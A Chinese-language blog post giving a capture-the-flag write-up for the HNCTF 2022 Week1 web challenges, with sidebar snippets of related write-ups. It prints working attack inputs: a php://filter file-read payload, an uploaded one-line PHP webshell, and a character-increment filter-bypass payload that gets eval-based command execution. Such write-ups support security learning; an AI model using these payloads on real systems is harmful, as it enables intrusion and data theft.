HNCTF 2022 Week1 web方向

最新推荐文章于 2024-05-14 21:34:19 发布
最新推荐文章于 2024-05-14 21:34:19 发布
阅读量217 收藏 3
点赞数 8
文章标签: 前端 网络安全 web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/konpure/article/details/137610011
版权

HNCTF 2022 Week1 web方向

Interesting_include

进题代码如下,直接php伪协议读取

<?php
//WEB手要懂得搜索
//flag in ./flag.php

if(isset($_GET['filter'])){
    $file = $_GET['filter'];
    if(!preg_match("/flag/i", $file)){
        die("error");
    }
    include($file);
}else{
    highlight_file(__FILE__);
}

filter=php://filter/read=convert.base64-encode/resource=./flag.php

2048

直接在js源码中找到了如下内容

if (this.score > 20000)
		{
		   //var md5util= require("md5.js"); //写文件路径即可
            alert(String.fromCharCode(24685,21916,33,102,108,97,103,123,53,51,49,54,48,99,56,56,56,101,50,53,99,51,102,56,50,56,98,50,51,101,51,49,54,97,55,97,101,48,56,51,125));
		}

直接把alert语句放在控制台运行,即可得到flag

easy_html

进题说饼干中好像有什么东西,于是查看cookie,发现cookie内容为flagisin=.%2Ff14g.php,前往**.%2Ff14g.php**查看,出现了一个登录框,测试了sql注入和ssti注入发现都不行,随后查看源码发现允许输入的最大长度为10,与正常手机号长度不符

<form action="f14g.php" method="post">
请输入手机号登录:<input type="text" maxlength="10" name="cnt">

    <br>
    <input type="submit" name="login" value="登录">
    </form>

修改长度为11后传入长度为11的数字串即可得到flag

What is Web

今天,看源码,在源码底部找到了经过base64编码的flag

Interesting_http

进题,根据题目内容可知要用post传want参数,然后改cookie,然后xff伪造即可,bp发包如下请添加图片描述

easy_upload

文件上传题,直接传一个含有一句话木马的php文件,然后前往文件上传路径后用蚁剑连接即可找到flag

Challenge__rce

进题什么都没有,查看源码,可知要用hit进行GET传参,随意传了个内容后出现了如下代码

<?php
error_reporting(0);
if (isset($_GET['hint'])) {
    highlight_file(__FILE__);
}
if (isset($_POST['rce'])) {
    $rce = $_POST['rce'];
    if (strlen($rce) <= 120) {
        if (is_string($rce)) {
            if (!preg_match("/[!@#%^&*:'\-<?>\"\/|`a-zA-Z~\\\\]/", $rce)) {
                eval($rce);
            } else {
                echo("Are you hack me?");
            }
        } else {
            echo "I want string!";
        }
    } else {
        echo "too long!";
    }
}

对代码进行审计,首先传入的rce长度不能超过120,然后过滤了一堆符号和字母,根据过滤可知该题可以使用自增绕过,payload如下

GET:?hint&1=system&2=nl /f*

POST:rce=rce=$_=[]._;$_3=$_[1];$_=$_[3];++$_;$_1=++$_;++$_;++$_;++$_;++$_;$_=$_1.++$_.$_3;$_=_.$_(71).$_(69).$_(84);$$_[1]($$_[2]);
konpure
关注
  • 8
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
week2day2
02-18
在"week2day2"的学习中,你可能还会接触到如何编写注释、如何组织和规划文档结构、如何调试HTML代码以及如何与其他Web技术(如CSS和JavaScript)配合使用。通过实践项目,你可以巩固这些概念,创建出自己的静态网页...
xdoj-week1-题解
05-12
【XDOJ-week1-题解】是针对2018年XDOJ(西安电子科技大学在线评测系统)第一周训练赛的题目解答集。这个压缩包文件包含了参赛者或教练对这一周比赛中的编程题目的详细解析,旨在帮助学习者理解和解决竞赛中的算法...
HNCTF 2022 Week1 easync
2301_79793667的博客
12-11 98
第一次查找,发现了个flag,但貌似是个假的flag,如输入进去还真是假的。里边有好多文件,我们只能耐心寻找,先是找到了flag的前一半。首先打开环境,发现并没有附件,那我们先进行nc连接。那我们只能再次寻找,看看真的flag到底藏在哪。将两部分拼接到一起,就是我们要找的flag。然后又找到了flag的后一半。
nss_pwn部分题解
2302_79483906的博客
11-18 402
在函数开始时,通常会将当前函数的rbp保存起来,然后设置新的rbp作为当前栈帧的基址指针,这样可以方便地访问函数的局部变量和参数。附件内容为一个python代码,其中blacklist = ['cat','ls',' ','cd','echo','
NSS刷题--无参数RCE,自增RCE的学习
最新发布
qq_75120258的博客
05-14 702
打开界面,什么都没有,看一下源代码,直接访问hintRCE,进行代码审计,检查 $rce 的长度是否不超过 120 个字符。检查 $rce 是否是一个字符串类型使用正则表达式检查 $rce 中是否包含某些特殊字符。如果 $rce 满足上述条件,则使用 eval 函数执行 $rce 中的代码。考无参数RCE,并且过滤了^和~,不能使用取反与异或,那就只能使用自增了使用祖传playload看一看它显示太长了,那就换种形式,我们构造参数,再上传参数,以达到减少长度的目的。
[HNCTF 2022 Week1]easy_html
J_linnb的博客
04-22 366
2.饼干的指的就是Cookie,查看Cookie,可以看到flagisin:%2Ff14g.php(解析后是:/f14g.php)3.访问该地址 ,要求我们输入手机号,发现输入框限制了位数,只能输入十位。第一种:按F12修改页面属性,将最大长度改为11。第二种:使用burpsuite提交post参数。抓包后将参数改为十一位数字,发送后出现flag。1.打开链接,提示饼干中好像有东西。接着输入十一位数字,找到flag。
[HNCTF 2022 Week1]easy_upload
qq_66013948的博客
10-25 159
之后使用burp抓包,将其文件类型改为image/jpeg之后放行就可以上传成功了,浏览器上能够有回显,之后我们访问这个文件,能发现浏览器有GIF89a的回显,那么就证明能访问到,之后,我们就可以通过get传参来获取flag,我们构造语句为。刚开始看到这道题的时候,毫无疑问,可以看出来这是一道文件上传漏洞,既然如此,就按照寻常的方法来做这一题,首先写一个文件叫getshell.php的文件,里面的内容为。一次增加../的个数来查看文件夹,根据名称判断flag是否在里边,之后就构造。来获取flag的值。
[HNCTF 2022 Week1]Challenge__rce
m0_70819573的博客
04-17 790
由于php变量没有赋值时默认是零,且数组与字符串拼接时返回Array,由此由A自增可以得到全部26位字母通过拼接构造payload.对字符串进行异或操作时,php解析时会将异或结果自动转换为字符串,以其给$_赋值,再通过拼接获取payload。也就是对$a进行取反操作,形成非常规字符绕过限制,在浏览器解析的时候,再还原成原来的payload.而在本题,由于长度限制,所以可以构造参数,再上传参数减少长度。无参RCE,主要方法有三种,取反,自增,异或。这里因为~和^都被过滤了,所以考虑自增。
2022 SWPU新生赛&HNCTF web部分题目
weixin_63231007的博客
11-02 3213
SWPU在start.php 界面抓个包,发包得到:F1l1l1l1l1lag.phpThinkPHP V5 rce 漏洞在网上可以找到现成的payload替换whoami命令为我们要执行的命令即可反序列化构造 assert(eval($_POST[1]));cat /flag即可ez_1zpop之后把属性改大一位,绕过__wakeup()函数numgame查看js源码发现了NsScTf.php。
cs50web:webdev week.1
03-29
【cs50web:webdev week.1】是哈佛大学CS50课程的网络开发部分第一周的内容,主要聚焦在Web开发的基础知识上,特别是与Python语言相关的技术。这一周的学习旨在为初学者构建一个坚实的Web开发基础,涵盖了一系列关键...
web week one
01-20
Web Week One】的学习计划涵盖了基础的Web开发环境搭建、网络协议理解以及编程语言和标记语言的基础知识。以下是对这些内容的详细说明: 1. **环境配置**: - **PHPStudy**: PHPStudy是一个集成的PHP开发环境,...
Algorithm Part2 Week1 Assigment
11-22
标题中的"Algorithm Part2 Week1 Assigment"指的是一个算法课程的第二部分第一周的作业,这个作业聚焦于计算两个单词的相似度。这通常是一个在自然语言处理(NLP)领域的重要问题,用于理解词汇之间的关系和含义。在...
HNCTF 2022 week1 web方向题解
m0_74160536的博客
08-01 681
简单说一下file伪协议,也是引用的别人博客(https://blog.csdn.net/qq_37466661/article/details/126203437)但正常情况下,我们输入php?filter=flag.php,只会发现一片空白,这时就需要用到php伪协议了,而这道题使用的就是file伪协议。检查-网络-刷新网页,只有两个网络响应,不过另一个是图标,不用管,打开cookie,提示去/f14g.php,跳转。打开环境,是一个小游戏,目标是2000分,不用管,小游戏题基本都是找js代码。
HNCTF 2022 Week1 easyoverflow
2301_79793667的博客
12-19 539
存在危险函数gets,填满数组v4后填充v5,当v5!=0时,自动弹出flag,所以要用变量覆写。、先进行nc连接,发现输入一些东西后会被弹出程序。检查一下附件位数,用相应位数ida打开。首先开启环境,下载附件。
[HNCTF 2022 Week1] PWN 复现
Xzzzz911的博客
08-18 1474
至于payload的构造格式,就要了解64位程序的传参方式,前六个参数是通过rdi, rsi, rdx, rcx, r8, r9, 这六个寄存器,后续的参数通过栈传递,记住格式就行。首先分析一下代码,可知出现了两个buf,但是这两个buf的作用是不同的,第一个buf在bss段,这样就可以把binsh写进buf里面,然后执行system(binsh)获得flag。签到题,直接nc就行,但是这里有坑需要注意下,直接cat flag,得到的是一个假的flag,真的flag分为两部分,这点需要注意下。
RCE-远程代码执行漏洞
2301_80661529的博客
03-10 940
远程代码执行(Remote Code Execution,RCE)是一种严重的安全漏洞,允许攻击者在目标服务器或应用程序上执行任意代码。这种漏洞的出现通常源于以下几个方面的缺陷:用户输入未经过滤或验证:当服务器端应用程序未能正确验证用户提交的数据,如HTTP请求参数、文件上传内容、数据库查询语句等,攻击者可能会将恶意代码注入到这些输入中。代码执行功能的设计缺陷:有些系统或应用提供了执行代码的接口,如PHP的函数、Java的反序列化漏洞等,若未做足够的安全防护,攻击者可通过操纵输入使得这些接口执行恶意代码。组
2022HNCTF-web
bossDDYY的博客
10-30 3188
应该和http协议有关 想要什么 肯定flag说我们不是admin 看看cookie修改cookie继续修改 x-forwarded-for [Week1]2048 分析 题目描述你能达到20000分吗?应该是要求我们玩到20000分F12查看脚本直接输入在控制台输入 [Week1]easy_html 分析 输入框限制了11位 f12修改html属性 或者直接post参数 [Week1]Interesting_include 分析 题目描述:web手要懂得搜索 应该要借助浏览器一眼伪协议base64解码 [
HNCTF 2022-WEB部分wp
m0_74606212的博客
10-30 199
HNCTF 2022-WEB部分wp
[HNCTF 2022 WEEK2]ez_ssrf
07-27
\[HNCTF 2022 WEEK2\]ez_ssrf是一个题目或挑战的名称,它涉及到SSRF(Server-Side Request Forgery)攻击。在这个挑战中,通过构造恶意的请求,攻击者可以利用目标服务器发起未经授权的请求,可能导致信息泄露、远程代码执行等安全问题。根据引用\[2\]中的代码片段,这个挑战可能涉及到通过传递参数来实现SSRF攻击,其中包括目标主机和端口。具体的攻击方法和解决方案需要根据题目的具体要求和环境来确定。 #### 引用[.reference_title] - *1* *2* [SSRF总结](https://blog.csdn.net/weixin_53090346/article/details/129025771)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [2022 SWPU新生赛&HNCTF web部分题目](https://blog.csdn.net/weixin_63231007/article/details/127135455)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值